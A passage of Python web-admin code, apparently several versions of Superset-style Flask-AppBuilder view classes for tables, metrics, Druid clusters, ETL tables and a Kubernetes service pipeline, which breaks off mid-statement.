class SqlMetricInlineView(CompactCRUDMixin, SupersetModelView): datamodel = SQLAInterface(models.SqlMetric) class_permission_name = "Dataset" method_permission_name = MODEL_VIEW_RW_METHOD_PERMISSION_MAP include_route_methods = RouteMethod.RELATED_VIEW_SET | RouteMethod.API_SET list_title = _("Metrics") show_title = _("Show Metric") add_title = _("Add Metric") edit_title = _("Edit Metric") list_columns = ["metric_name", "verbose_name", "metric_type"] edit_columns = [ "metric_name", "description", "verbose_name", "metric_type", "expression", "table", "d3format", "extra", "warning_text", ] description_columns = { "expression": utils.markdown( "a valid, *aggregating* SQL expression as supported by the " "underlying backend. Example: `count(DISTINCT userid)`", True, ), "d3format": utils.markdown( "d3 formatting string as defined [here]" "(https://github.com/d3/d3-format/blob/master/README.md#format). " "For instance, this default formatting applies in the Table " "visualization and allow for different metric to use different " "formats", True, ), "extra": utils.markdown( "Extra data to specify metric metadata. Currently supports " 'metadata of the format: `{ "certification": { "certified_by": ' '"Data Platform Team", "details": "This metric is the source of truth." ' '}, "warning_markdown": "This is a warning." }`. This should be modified ' "from the edit datasource model in Explore to ensure correct formatting.", True, ), } add_columns = edit_columns page_size = 500 label_columns = { "metric_name": _("Metric"), "description": _("Description"), "verbose_name": _("Verbose Name"), "metric_type": _("Type"), "expression": _("SQL Expression"), "table": _("Table"), "d3format": _("D3 Format"), "extra": _("Extra"), "warning_text": _("Warning Message"), } add_form_extra_fields = { "table": QuerySelectField( "Table", query_factory=lambda: db.session.query(models.SqlaTable), allow_blank=True, widget=Select2Widget(extra_classes="readonly"), ) } edit_form_extra_fields = add_form_extra_fields
class TableModelView( # pylint: disable=too-many-ancestors DatasourceModelView, DeleteMixin, YamlExportMixin): datamodel = SQLAInterface(models.SqlaTable) include_route_methods = RouteMethod.CRUD_SET list_title = _("Tables") show_title = _("Show Table") add_title = _("Import a table definition") edit_title = _("Edit Table") list_columns = ["link", "database_name", "changed_by_", "modified"] order_columns = ["modified"] add_columns = ["database", "schema", "table_name"] edit_columns = [ "table_name", "sql", "filter_select_enabled", "fetch_values_predicate", "database", "schema", "description", "owners", "main_dttm_col", "default_endpoint", "offset", "cache_timeout", "is_sqllab_view", "template_params", "extra", ] base_filters = [["id", DatasourceFilter, lambda: []]] show_columns = edit_columns + ["perm", "slices"] related_views = [ TableColumnInlineView, SqlMetricInlineView, ] base_order = ("changed_on", "desc") search_columns = ("database", "schema", "table_name", "owners", "is_sqllab_view") description_columns = { "slices": _("The list of charts associated with this table. By " "altering this datasource, you may change how these associated " "charts behave. " "Also note that charts need to point to a datasource, so " "this form will fail at saving if removing charts from a " "datasource. If you want to change the datasource for a chart, " "overwrite the chart from the 'explore view'"), "offset": _("Timezone offset (in hours) for this datasource"), "table_name": _("Name of the table that exists in the source database"), "schema": _("Schema, as used only in some databases like Postgres, Redshift " "and DB2"), "description": Markup( 'Supports <a href="https://daringfireball.net/projects/markdown/">' "markdown</a>"), "sql": _("This fields acts a Superset view, meaning that Superset will " "run a query against this string as a subquery."), "fetch_values_predicate": _("Predicate applied when fetching distinct value to " "populate the filter control component. Supports " "jinja template syntax. Applies only when " "`Enable Filter Select` is on."), "default_endpoint": _("Redirects to this endpoint when clicking on the table " "from the table list"), "filter_select_enabled": _("Whether to populate the filter's dropdown in the explore " "view's filter section with a list of distinct values fetched " "from the backend on the fly"), "is_sqllab_view": _("Whether the table was generated by the 'Visualize' flow " "in SQL Lab"), "template_params": _("A set of parameters that become available in the query using " "Jinja templating syntax"), "cache_timeout": _("Duration (in seconds) of the caching timeout for this table. " "A timeout of 0 indicates that the cache never expires. " "Note this defaults to the database timeout if undefined."), "extra": utils.markdown( "Extra data to specify table metadata. Currently supports " 'certification data of the format: `{ "certification": { "certified_by": ' '"Data Platform Team", "details": "This table is the source of truth." ' "} }`.", True, ), } label_columns = { "slices": _("Associated Charts"), "link": _("Table"), "changed_by_": _("Changed By"), "database": _("Database"), "database_name": _("Database"), "changed_on_": _("Last Changed"), "filter_select_enabled": _("Enable Filter Select"), "schema": _("Schema"), "default_endpoint": _("Default Endpoint"), "offset": _("Offset"), "cache_timeout": _("Cache Timeout"), "table_name": _("Table Name"), "fetch_values_predicate": _("Fetch Values Predicate"), "owners": _("Owners"), "main_dttm_col": _("Main Datetime Column"), "description": _("Description"), "is_sqllab_view": _("SQL Lab View"), "template_params": _("Template parameters"), "extra": _("Extra"), "modified": _("Modified"), } edit_form_extra_fields = { "database": QuerySelectField( "Database", query_factory=lambda: db.session.query(models.Database), widget=Select2Widget(extra_classes="readonly"), ) } def pre_add(self, item: "TableModelView") -> None: validate_sqlatable(item) def post_add( # pylint: disable=arguments-differ self, item: "TableModelView", flash_message: bool = True) -> None: item.fetch_metadata() create_table_permissions(item) if flash_message: flash( _("The table was created. " "As part of this two-phase configuration " "process, you should now click the edit button by " "the new table to configure it."), "info", ) def post_update(self, item: "TableModelView") -> None: self.post_add(item, flash_message=False) def _delete(self, pk: int) -> None: DeleteMixin._delete(self, pk) @expose("/edit/<pk>", methods=["GET", "POST"]) @has_access def edit(self, pk: int) -> FlaskResponse: """Simple hack to redirect to explore view after saving""" resp = super(TableModelView, self).edit(pk) if isinstance(resp, str): return resp return redirect("/superset/explore/table/{}/".format(pk)) @action("refresh", __("Refresh Metadata"), __("Refresh column metadata"), "fa-refresh") def refresh( # pylint: disable=no-self-use, too-many-branches self, tables: Union["TableModelView", List["TableModelView"]]) -> FlaskResponse: if not isinstance(tables, list): tables = [tables] @dataclass class RefreshResults: successes: List[TableModelView] = field(default_factory=list) failures: List[TableModelView] = field(default_factory=list) added: Dict[str, List[str]] = field(default_factory=dict) removed: Dict[str, List[str]] = field(default_factory=dict) modified: Dict[str, List[str]] = field(default_factory=dict) results = RefreshResults() for table_ in tables: try: metadata_results = table_.fetch_metadata() if metadata_results.added: results.added[table_.table_name] = metadata_results.added if metadata_results.removed: results.removed[ table_.table_name] = metadata_results.removed if metadata_results.modified: results.modified[ table_.table_name] = metadata_results.modified results.successes.append(table_) except Exception: # pylint: disable=broad-except results.failures.append(table_) if len(results.successes) > 0: success_msg = _( "Metadata refreshed for the following table(s): %(tables)s", tables=", ".join([t.table_name for t in results.successes]), ) flash(success_msg, "info") if results.added: added_tables = [] for table, cols in results.added.items(): added_tables.append(f"{table} ({', '.join(cols)})") flash( _( "The following tables added new columns: %(tables)s", tables=", ".join(added_tables), ), "info", ) if results.removed: removed_tables = [] for table, cols in results.removed.items(): removed_tables.append(f"{table} ({', '.join(cols)})") flash( _( "The following tables removed columns: %(tables)s", tables=", ".join(removed_tables), ), "info", ) if results.modified: modified_tables = [] for table, cols in results.modified.items(): modified_tables.append(f"{table} ({', '.join(cols)})") flash( _( "The following tables update column metadata: %(tables)s", tables=", ".join(modified_tables), ), "info", ) if len(results.failures) > 0: failure_msg = _( "Unable to refresh metadata for the following table(s): %(tables)s", tables=", ".join([t.table_name for t in results.failures]), ) flash(failure_msg, "danger") return redirect("/tablemodelview/list/") @expose("/list/") @has_access def list(self) -> FlaskResponse: if not is_feature_enabled("ENABLE_REACT_CRUD_VIEWS"): return super().list() return super().render_app_template()
class DruidClusterModelView(SupersetModelView, DeleteMixin, YamlExportMixin): datamodel = SQLAInterface(models.DruidCluster) list_title = _("Druid Clusters") show_title = _("Show Druid Cluster") add_title = _("Add Druid Cluster") edit_title = _("Edit Druid Cluster") add_columns = [ "verbose_name", "broker_host", "broker_port", "broker_user", "broker_pass", "broker_endpoint", "cache_timeout", "cluster_name", ] edit_columns = add_columns list_columns = ["cluster_name", "metadata_last_refreshed"] search_columns = ("cluster_name", ) label_columns = { "cluster_name": _("Cluster"), "broker_host": _("Broker Host"), "broker_port": _("Broker Port"), "broker_user": _("Broker Username"), "broker_pass": _("Broker Password"), "broker_endpoint": _("Broker Endpoint"), "verbose_name": _("Verbose Name"), "cache_timeout": _("Cache Timeout"), "metadata_last_refreshed": _("Metadata Last Refreshed"), } description_columns = { "cache_timeout": _("Duration (in seconds) of the caching timeout for this cluster. " "A timeout of 0 indicates that the cache never expires. " "Note this defaults to the global timeout if undefined."), "broker_user": _("Druid supports basic authentication. See " "[auth](http://druid.io/docs/latest/design/auth.html) and " "druid-basic-security extension"), "broker_pass": _("Druid supports basic authentication. See " "[auth](http://druid.io/docs/latest/design/auth.html) and " "druid-basic-security extension"), } yaml_dict_key = "databases" edit_form_extra_fields = { "cluster_name": QuerySelectField( "Cluster", query_factory=lambda: db.session().query(models.DruidCluster), widget=Select2Widget(extra_classes="readonly"), ) } def pre_add(self, cluster): security_manager.add_permission_view_menu("database_access", cluster.perm) def pre_update(self, cluster): self.pre_add(cluster) def _delete(self, pk): DeleteMixin._delete(self, pk)
class DruidMetricInlineView(CompactCRUDMixin, SupersetModelView): # noqa datamodel = SQLAInterface(models.DruidMetric) list_title = _("Metrics") show_title = _("Show Druid Metric") add_title = _("Add Druid Metric") edit_title = _("Edit Druid Metric") list_columns = ["metric_name", "verbose_name", "metric_type"] edit_columns = [ "metric_name", "description", "verbose_name", "metric_type", "json", "datasource", "d3format", "is_restricted", "warning_text", ] add_columns = edit_columns page_size = 500 validators_columns = {"json": [validate_json]} description_columns = { "metric_type": utils.markdown( "use `postagg` as the metric type if you are defining a " "[Druid Post Aggregation]" "(http://druid.io/docs/latest/querying/post-aggregations.html)", True, ), "is_restricted": _( "Whether access to this metric is restricted " "to certain roles. Only roles with the permission " "'metric access on XXX (the name of this metric)' " "are allowed to access this metric" ), } label_columns = { "metric_name": _("Metric"), "description": _("Description"), "verbose_name": _("Verbose Name"), "metric_type": _("Type"), "json": _("JSON"), "datasource": _("Druid Datasource"), "warning_text": _("Warning Message"), "is_restricted": _("Is Restricted"), } add_form_extra_fields = { "datasource": QuerySelectField( "Datasource", query_factory=lambda: db.session().query(models.DruidDatasource), allow_blank=True, widget=Select2Widget(extra_classes="readonly"), ) } edit_form_extra_fields = add_form_extra_fields def post_add(self, metric): if metric.is_restricted: security_manager.add_permission_view_menu( "metric_access", metric.get_perm() ) def post_update(self, metric): if metric.is_restricted: security_manager.add_permission_view_menu( "metric_access", metric.get_perm() )
class ReportForm(DynamicForm): report_id = HiddenField() schedule_timezone = HiddenField() report_title = StringField( ("Title"), description="Title will be used as the report's name", widget=BS3TextFieldWidget(), validators=[DataRequired()], ) description = TextAreaField(("Description"), widget=BS3TextAreaFieldWidget(), validators=[DataRequired()]) owner_name = StringField(("Owner Name"), widget=BS3TextFieldWidget(), validators=[DataRequired()]) owner_email = StringField( ("Owner Email"), description="Owner email will be added to the subscribers list", widget=BS3TextFieldWidget(), validators=[DataRequired(), Email()], ) subscribers = StringField( ("Subscribers"), description=("List of comma separeted emails that should receive email\ notifications. Automatically adds owner email to this list."), widget=BS3TextFieldWidget(), ) tests = SelectMultipleField( ("Tests"), description=( "List of the tests to include in the report. Only includes\ tasks that have ran in airflow."), choices=None, widget=Select2ManyWidget(), validators=[DataRequired()], ) schedule_type = SelectField( ("Schedule"), description=("Select how you want to schedule the report"), choices=[ ("manual", "None (Manual triggering)"), ("daily", "Daily"), ("weekly", "Weekly"), ("custom", "Custom (Cron)"), ], widget=Select2Widget(), validators=[DataRequired()], ) schedule_time = TimeField( "Time", description=("Note that time zone being used is the " "selected timezone in your clock interface."), render_kw={"class": "form-control"}, validators=[DataRequired()], ) schedule_week_day = SelectField( ("Day of week"), description=("Select day of a week you want to schedule the report"), choices=[ ("0", "Sunday"), ("1", "Monday"), ("2", "Tuesday"), ("3", "Wednesday"), ("4", "Thursday"), ("5", "Friday"), ("6", "Saturday"), ], widget=Select2Widget(), validators=[DataRequired()], ) schedule_custom = StringField( ("Cron schedule"), description=('Enter cron schedule (e.g. "0 0 * * *").\ Note that time zone being used is UTC.'), widget=BS3TextFieldWidget(), validators=[DataRequired()], )
class EtlTableView(SupersetModelView, DeleteMixin): """View For EtlTable Model.""" datamodel = SQLAInterface(EtlTable) list_columns = [ 'connector.type', 'connector.name', 'table.database', 'table', 'datasource', 'sql_table_name', 'downloaded_rows', 'progress', 'sync_last', 'sync_last_time', 'status', 'save_in_prt', 'sync_field', 'repr_sync_periodic', 'sync_next_time', 'is_valid', 'is_active', 'is_scheduled' # 'table.sql' ] add_columns = [ 'connector', 'table', 'datasource', 'name', 'save_in_prt', 'calculate_progress', 'sync_field', 'sync_last', 'chunk_size', 'sync_periodic', 'sync_periodic_hour' ] edit_schema = ['schema'] edit_columns = [ 'calculate_progress', 'save_in_prt', 'sync_field', 'sync_last', 'chunk_size', 'sync_periodic', 'sync_periodic_hour', 'is_active' ] edit_columns = edit_columns # edit_columns = add_columns + ['sync_last_time', 'sync_next_time'] label_columns = { 'table.database': 'Instance', 'connector': 'DataSource Connector', 'table': 'DataSource SQLTable', 'name': '_etl_{name}', } description_columns = { 'table': _('<a href="/tablemodelview/list/">Create table </a>'), } etl_extra_fields = { # 'datasource': AJAXSelectField('Extra Field2', # description='Extra Field description', # datamodel=datamodel, # col_name='datasource', # widget=Select2AJAXWidget( # # master_id='connector', # endpoint='/connectorview/api/column/add/datasource' # # # http://127.0.0.1:5000/connectorview/api/column/add/get_admin_data_sources?_flt_0_id=1 # noqa # # endpoint='/appsflyerconnectorview/api/column/add/contact_sub_group?_flt_0__id={{ID}}' # noqa # # # endpoint='/appsflyerconnectorview/api/read?_flt_0_id={{ID}}' # noqa # ) # ), # 'datasource': AJAXSelectField('Extra Field2', # description='Extra Field description', # datamodel=datamodel, # col_name='reports', # widget=Select2SlaveAJAXWidget( # master_id='connector', # # endpoint='/appsflyerconnectorview/api/column/add/contact_sub_group?_flt_0__id={{ID}}') # noqa # endpoint='/appsflyerconnectorview/api/read?_flt_0_id={{ID}}' # ) # ), 'sync_periodic': SelectField(choices=EtlPeriod.CHOICES, widget=Select2Widget(), coerce=int), 'sync_periodic_hour': SelectField(choices=EtlPeriod.HOURS, widget=Select2Widget(), coerce=int, description=_('Use if you select one of [Once a month, ' 'Once a week, Once a day] Sync Periodic')), } add_form_extra_fields = etl_extra_fields edit_form_extra_fields = etl_extra_fields # description_columns = { # 'sync_periodic_hour': ( # 'Use if you select one of [Once a month, ' # 'Once a week, Once a day] Periodic' # ), # } # etl_extra_fields = {'schema': StringField(widget=BS3TextFieldROWidget())} # add_form_extra_fields = etl_extra_fields # edit_form_extra_fields = etl_extra_fields # related_views = [TableColumnInlineView] # actions @action('sync_etl', 'Sync', 'Sync data for this table', 'fa-play') def sync(self, item): """Call sync etl.""" item[0].sync_delay() return redirect('etltableview/list/') @action('re_sync_etl', 'ReSync', 'Clear data, and get new data for this table', 'fa-repeat') def re_sync(self, item): """Call ReSync etl.""" item[0].clear() item[0].sync_delay() return redirect('etltableview/list/') @action('check_sql', 'Check_sql', 'Stop sync data and clear data', 'fa-check') def check_sql(self, item): """Call stop etl.""" print(item[0].remote_etl_sql()) return redirect('etltableview/list/') @action('sync_etl_once', 'Sync once', 'Sync data for this table', 'fa-step-forward') def sync_once(self, item): """Call test_sync_etl.""" item[0].sync_once() return redirect('etltableview/list/') @action('sync_etl_stop', 'Sync stop', 'Stop sync data for this table', 'fa-stop') def sync_stop(self, item): """Call stop etl.""" item[0].stop() return redirect('etltableview/list/') @action('clear_etl', 'Clear', 'Stop sync data and clear data', 'fa-trash-o') def clear_etl(self, item): """Call stop etl.""" item[0].clear() return redirect('etltableview/list/') def pre_add(self, obj): """Check data before save""" if obj.name == '': raise Exception('Enter a table name') obj.create_table() obj.sync_next_time = obj.get_next_sync() # obj.cccc() # def post_add(self): # # create ds table # # return def pre_update(self, obj): obj.sync_next_time = obj.get_next_sync() def pre_delete(self, obj): logging.info('pre_delete') if obj.exist_table(): obj.delete_table()
class DruidDatasourceModelView(DatasourceModelView, DeleteMixin, YamlExportMixin): datamodel = SQLAInterface(models.DruidDatasource) include_route_methods = RouteMethod.CRUD_SET list_title = _("Druid Datasources") show_title = _("Show Druid Datasource") add_title = _("Add Druid Datasource") edit_title = _("Edit Druid Datasource") list_columns = ["datasource_link", "cluster", "changed_by_", "modified"] order_columns = ["datasource_link", "modified"] related_views = [DruidColumnInlineView, DruidMetricInlineView] edit_columns = [ "datasource_name", "cluster", "description", "owners", "is_hidden", "filter_select_enabled", "fetch_values_from", "default_endpoint", "offset", "cache_timeout", ] search_columns = ("datasource_name", "cluster", "description", "owners") add_columns = edit_columns show_columns = add_columns + ["perm", "slices"] page_size = 500 base_order = ("datasource_name", "asc") description_columns = { "slices": _( "The list of charts associated with this table. By " "altering this datasource, you may change how these associated " "charts behave. " "Also note that charts need to point to a datasource, so " "this form will fail at saving if removing charts from a " "datasource. If you want to change the datasource for a chart, " "overwrite the chart from the 'explore view'" ), "offset": _("Timezone offset (in hours) for this datasource"), "description": Markup( 'Supports <a href="' 'https://daringfireball.net/projects/markdown/">markdown</a>' ), "fetch_values_from": _( "Time expression to use as a predicate when retrieving " "distinct values to populate the filter component. " "Only applies when `Enable Filter Select` is on. If " "you enter `7 days ago`, the distinct list of values in " "the filter will be populated based on the distinct value over " "the past week" ), "filter_select_enabled": _( "Whether to populate the filter's dropdown in the explore " "view's filter section with a list of distinct values fetched " "from the backend on the fly" ), "default_endpoint": _( "Redirects to this endpoint when clicking on the datasource " "from the datasource list" ), "cache_timeout": _( "Duration (in seconds) of the caching timeout for this datasource. " "A timeout of 0 indicates that the cache never expires. " "Note this defaults to the cluster timeout if undefined." ), } base_filters = [["id", DatasourceFilter, lambda: []]] label_columns = { "slices": _("Associated Charts"), "datasource_link": _("Data Source"), "cluster": _("Cluster"), "description": _("Description"), "owners": _("Owners"), "is_hidden": _("Is Hidden"), "filter_select_enabled": _("Enable Filter Select"), "default_endpoint": _("Default Endpoint"), "offset": _("Time Offset"), "cache_timeout": _("Cache Timeout"), "datasource_name": _("Datasource Name"), "fetch_values_from": _("Fetch Values From"), "changed_by_": _("Changed By"), "modified": _("Modified"), } edit_form_extra_fields = { "cluster": QuerySelectField( "Cluster", query_factory=lambda: db.session.query(models.DruidCluster), widget=Select2Widget(extra_classes="readonly"), ), "datasource_name": StringField( "Datasource Name", widget=BS3TextFieldROWidget() ), } def pre_add(self, item: "DruidDatasourceModelView") -> None: with db.session.no_autoflush: query = db.session.query(models.DruidDatasource).filter( models.DruidDatasource.datasource_name == item.datasource_name, models.DruidDatasource.cluster_id == item.cluster_id, ) if db.session.query(query.exists()).scalar(): raise Exception(get_datasource_exist_error_msg(item.full_name)) def post_add(self, item: "DruidDatasourceModelView") -> None: item.refresh_metrics() security_manager.add_permission_view_menu("datasource_access", item.get_perm()) if item.schema: security_manager.add_permission_view_menu("schema_access", item.schema_perm) def post_update(self, item: "DruidDatasourceModelView") -> None: self.post_add(item) def _delete(self, pk: int) -> None: DeleteMixin._delete(self, pk)
class DruidColumnInlineView(CompactCRUDMixin, SupersetModelView): # noqa datamodel = SQLAInterface(models.DruidColumn) list_title = _('Columns') show_title = _('Show Druid Column') add_title = _('Add Druid Column') edit_title = _('Edit Druid Column') list_widget = ListWidgetWithCheckboxes edit_columns = [ 'column_name', 'verbose_name', 'description', 'dimension_spec_json', 'datasource', 'groupby', 'filterable' ] add_columns = edit_columns list_columns = [ 'column_name', 'verbose_name', 'type', 'groupby', 'filterable' ] can_delete = False page_size = 500 label_columns = { 'column_name': _('Column'), 'type': _('Type'), 'datasource': _('Datasource'), 'groupby': _('Groupable'), 'filterable': _('Filterable'), } description_columns = { 'filterable': _('Whether this column is exposed in the `Filters` section ' 'of the explore view.'), 'dimension_spec_json': utils.markdown( 'this field can be used to specify ' 'a `dimensionSpec` as documented [here]' '(http://druid.io/docs/latest/querying/dimensionspecs.html). ' 'Make sure to input valid JSON and that the ' '`outputName` matches the `column_name` defined ' 'above.', True), } add_form_extra_fields = { 'datasource': QuerySelectField( 'Datasource', query_factory=lambda: db.session().query(models.DruidDatasource), allow_blank=True, widget=Select2Widget(extra_classes='readonly'), ), } edit_form_extra_fields = add_form_extra_fields def pre_update(self, col): # If a dimension spec JSON is given, ensure that it is # valid JSON and that `outputName` is specified if col.dimension_spec_json: try: dimension_spec = json.loads(col.dimension_spec_json) except ValueError as e: raise ValueError('Invalid Dimension Spec JSON: ' + str(e)) if not isinstance(dimension_spec, dict): raise ValueError('Dimension Spec must be a JSON object') if 'outputName' not in dimension_spec: raise ValueError( 'Dimension Spec does not contain `outputName`') if 'dimension' not in dimension_spec: raise ValueError('Dimension Spec is missing `dimension`') # `outputName` should be the same as the `column_name` if dimension_spec['outputName'] != col.column_name: raise ValueError( '`outputName` [{}] unequal to `column_name` [{}]'.format( dimension_spec['outputName'], col.column_name)) def post_update(self, col): col.refresh_metrics() def post_add(self, col): self.post_update(col)
class SqlMetricInlineView(CompactCRUDMixin, SupersetModelView): # noqa datamodel = SQLAInterface(models.SqlMetric) list_title = _("Metrics") show_title = _("Show Metric") add_title = _("Add Metric") edit_title = _("Edit Metric") list_columns = ["metric_name", "verbose_name", "metric_type"] edit_columns = [ "metric_name", "description", "verbose_name", "metric_type", "expression", "table", "d3format", "is_restricted", "warning_text", ] description_columns = { "expression": utils.markdown( "a valid, *aggregating* SQL expression as supported by the " "underlying backend. Example: `count(DISTINCT userid)`", True, ), "is_restricted": _("Whether access to this metric is restricted " "to certain roles. Only roles with the permission " "'metric access on XXX (the name of this metric)' " "are allowed to access this metric"), "d3format": utils.markdown( "d3 formatting string as defined [here]" "(https://github.com/d3/d3-format/blob/master/README.md#format). " "For instance, this default formatting applies in the Table " "visualization and allow for different metric to use different " "formats", True, ), } add_columns = edit_columns page_size = 500 label_columns = { "metric_name": _("Metric"), "description": _("Description"), "verbose_name": _("Verbose Name"), "metric_type": _("Type"), "expression": _("SQL Expression"), "table": _("Table"), "d3format": _("D3 Format"), "is_restricted": _("Is Restricted"), "warning_text": _("Warning Message"), } add_form_extra_fields = { "table": QuerySelectField( "Table", query_factory=lambda: db.session().query(models.SqlaTable), allow_blank=True, widget=Select2Widget(extra_classes="readonly"), ) } edit_form_extra_fields = add_form_extra_fields def post_add(self, metric): if metric.is_restricted: security_manager.add_permission_view_menu("metric_access", metric.get_perm()) def post_update(self, metric): if metric.is_restricted: security_manager.add_permission_view_menu("metric_access", metric.get_perm())
class DruidMetricInlineView(CompactCRUDMixin, SupersetModelView): # noqa datamodel = SQLAInterface(models.DruidMetric) list_title = _('Metrics') show_title = _('Show Druid Metric') add_title = _('Add Druid Metric') edit_title = _('Edit Druid Metric') list_columns = ['metric_name', 'verbose_name', 'metric_type'] edit_columns = [ 'metric_name', 'description', 'verbose_name', 'metric_type', 'json', 'datasource', 'd3format', 'is_restricted', 'warning_text' ] add_columns = edit_columns page_size = 500 validators_columns = { 'json': [validate_json], } description_columns = { 'metric_type': utils.markdown( 'use `postagg` as the metric type if you are defining a ' '[Druid Post Aggregation]' '(http://druid.io/docs/latest/querying/post-aggregations.html)', True), 'is_restricted': _('Whether access to this metric is restricted ' 'to certain roles. Only roles with the permission ' "'metric access on XXX (the name of this metric)' " 'are allowed to access this metric'), } label_columns = { 'metric_name': _('Metric'), 'description': _('Description'), 'verbose_name': _('Verbose Name'), 'metric_type': _('Type'), 'json': _('JSON'), 'datasource': _('Druid Datasource'), 'warning_text': _('Warning Message'), 'is_restricted': _('Is Restricted'), } add_form_extra_fields = { 'datasource': QuerySelectField( 'Datasource', query_factory=lambda: db.session().query(models.DruidDatasource), allow_blank=True, widget=Select2Widget(extra_classes='readonly'), ), } edit_form_extra_fields = add_form_extra_fields def post_add(self, metric): if metric.is_restricted: security_manager.add_permission_view_menu('metric_access', metric.get_perm()) def post_update(self, metric): if metric.is_restricted: security_manager.add_permission_view_menu('metric_access', metric.get_perm())
class DruidClusterModelView(SupersetModelView, DeleteMixin, YamlExportMixin): # noqa datamodel = SQLAInterface(models.DruidCluster) list_title = _('Druid Clusters') show_title = _('Show Druid Cluster') add_title = _('Add Druid Cluster') edit_title = _('Edit Druid Cluster') add_columns = [ 'verbose_name', 'broker_host', 'broker_port', 'broker_user', 'broker_pass', 'broker_endpoint', 'cache_timeout', 'cluster_name', ] edit_columns = add_columns list_columns = ['cluster_name', 'metadata_last_refreshed'] search_columns = ('cluster_name', ) label_columns = { 'cluster_name': _('Cluster'), 'broker_host': _('Broker Host'), 'broker_port': _('Broker Port'), 'broker_user': _('Broker Username'), 'broker_pass': _('Broker Password'), 'broker_endpoint': _('Broker Endpoint'), 'verbose_name': _('Verbose Name'), 'cache_timeout': _('Cache Timeout'), 'metadata_last_refreshed': _('Metadata Last Refreshed'), } description_columns = { 'cache_timeout': _('Duration (in seconds) of the caching timeout for this cluster. ' 'A timeout of 0 indicates that the cache never expires. ' 'Note this defaults to the global timeout if undefined.'), 'broker_user': _( 'Druid supports basic authentication. See ' '[auth](http://druid.io/docs/latest/design/auth.html) and ' 'druid-basic-security extension', ), 'broker_pass': _( 'Druid supports basic authentication. See ' '[auth](http://druid.io/docs/latest/design/auth.html) and ' 'druid-basic-security extension', ), } edit_form_extra_fields = { 'cluster_name': QuerySelectField( 'Cluster', query_factory=lambda: db.session().query(models.DruidCluster), widget=Select2Widget(extra_classes='readonly'), ), } def pre_add(self, cluster): security_manager.add_permission_view_menu('database_access', cluster.perm) def pre_update(self, cluster): self.pre_add(cluster) def _delete(self, pk): DeleteMixin._delete(self, pk)
class Service_Pipeline_ModelView_Base(): label_title = '任务流' datamodel = SQLAInterface(Service_Pipeline) check_redirect_list_url = '/service_pipeline_modelview/list/' base_permissions = [ 'can_show', 'can_edit', 'can_list', 'can_delete', 'can_add' ] base_order = ("changed_on", "desc") # order_columns = ['id','changed_on'] order_columns = ['id'] list_columns = [ 'project', 'service_pipeline_url', 'creator', 'modified', 'operate_html' ] add_columns = [ 'project', 'name', 'describe', 'namespace', 'images', 'env', 'resource_memory', 'resource_cpu', 'resource_gpu', 'replicas', 'dag_json', 'alert_status', 'alert_user', 'parameter' ] show_columns = [ 'project', 'name', 'describe', 'namespace', 'run_id', 'created_by', 'changed_by', 'created_on', 'changed_on', 'expand_html', 'parameter_html' ] edit_columns = add_columns base_filters = [["id", Service_Pipeline_Filter, lambda: []]] # 设置权限过滤器 conv = GeneralModelConverter(datamodel) add_form_extra_fields = { "name": StringField(_(datamodel.obj.lab('name')), description="英文名(字母、数字、- 组成),最长50个字符", widget=BS3TextFieldWidget(), validators=[ Regexp("^[a-z][a-z0-9\-]*[a-z0-9]$"), Length(1, 54), DataRequired() ]), "project": QuerySelectField(_(datamodel.obj.lab('project')), query_factory=filter_join_org_project, allow_blank=True, widget=Select2Widget()), "dag_json": StringField( _(datamodel.obj.lab('dag_json')), widget=MyBS3TextAreaFieldWidget( rows=10), # 传给widget函数的是外层的field对象,以及widget函数的参数 ), "namespace": StringField(_(datamodel.obj.lab('namespace')), description="部署task所在的命名空间(目前无需填写)", default='service', widget=BS3TextFieldWidget()), "images": StringField( _(datamodel.obj.lab('images')), default='ccr.ccs.tencentyun.com/cube-studio/service-pipeline', description="推理服务镜像", widget=BS3TextFieldWidget(), validators=[DataRequired()]), "node_selector": StringField(_(datamodel.obj.lab('node_selector')), description="部署task所在的机器(目前无需填写)", widget=BS3TextFieldWidget(), default=datamodel.obj.node_selector.default.arg), "image_pull_policy": SelectField( _(datamodel.obj.lab('image_pull_policy')), description="镜像拉取策略(always为总是拉取远程镜像,IfNotPresent为若本地存在则使用本地镜像)", widget=Select2Widget(), choices=[['Always', 'Always'], ['IfNotPresent', 'IfNotPresent']]), "alert_status": MySelectMultipleField(label=_(datamodel.obj.lab('alert_status')), widget=Select2ManyWidget(), choices=[[x, x] for x in [ 'Created', 'Pending', 'Running', 'Succeeded', 'Failed', 'Unknown', 'Waiting', 'Terminated' ]], description="选择通知状态"), "alert_user": StringField(label=_(datamodel.obj.lab('alert_user')), widget=BS3TextFieldWidget(), description="选择通知用户,每个用户使用逗号分隔"), "label": StringField(_(datamodel.obj.lab('label')), description='中文名', widget=BS3TextFieldWidget(), validators=[DataRequired()]), "resource_memory": StringField(_(datamodel.obj.lab('resource_memory')), default=Service_Pipeline.resource_memory.default.arg, description='内存的资源使用限制,示例1G,10G, 最大100G,如需更多联系管路员', widget=BS3TextFieldWidget(), validators=[DataRequired()]), "resource_cpu": StringField(_(datamodel.obj.lab('resource_cpu')), default=Service_Pipeline.resource_cpu.default.arg, description='cpu的资源使用限制(单位核),示例 0.4,10,最大50核,如需更多联系管路员', widget=BS3TextFieldWidget(), validators=[DataRequired()]), "resource_gpu": StringField( _(datamodel.obj.lab('resource_gpu')), default=0, description= 'gpu的资源使用限制(单位卡),示例:1,2,训练任务每个容器独占整卡。申请具体的卡型号,可以类似 1(V100),目前支持T4/V100/A100/VGPU', widget=BS3TextFieldWidget()), "replicas": StringField(_(datamodel.obj.lab('replicas')), default=Service_Pipeline.replicas.default.arg, description='pod副本数,用来配置高可用', widget=BS3TextFieldWidget(), validators=[DataRequired()]), "env": StringField(_(datamodel.obj.lab('env')), default=Service_Pipeline.env.default.arg, description= '使用模板的task自动添加的环境变量,支持模板变量。书写格式:每行一个环境变量env_key=env_value', widget=MyBS3TextAreaFieldWidget()), } edit_form_extra_fields = add_form_extra_fields # 检测是否具有编辑权限,只有creator和admin可以编辑 def check_edit_permission(self, item): user_roles = [role.name.lower() for role in list(get_user_roles())] if "admin" in user_roles: return True if g.user and g.user.username and hasattr(item, 'created_by'): if g.user.username == item.created_by.username: return True flash('just creator can edit/delete ', 'warning') return False # 验证args参数 @pysnooper.snoop(watch_explode=('item')) def service_pipeline_args_check(self, item): core.validate_str(item.name, 'name') if not item.dag_json: item.dag_json = '{}' core.validate_json(item.dag_json) # 校验task的关系,没有闭环,并且顺序要对。没有配置的,自动没有上游,独立 # @pysnooper.snoop() def order_by_upstream(dag_json): order_dag = {} tasks_name = list(dag_json.keys()) # 如果没有配全的话,可能只有局部的task i = 0 while tasks_name: i += 1 if i 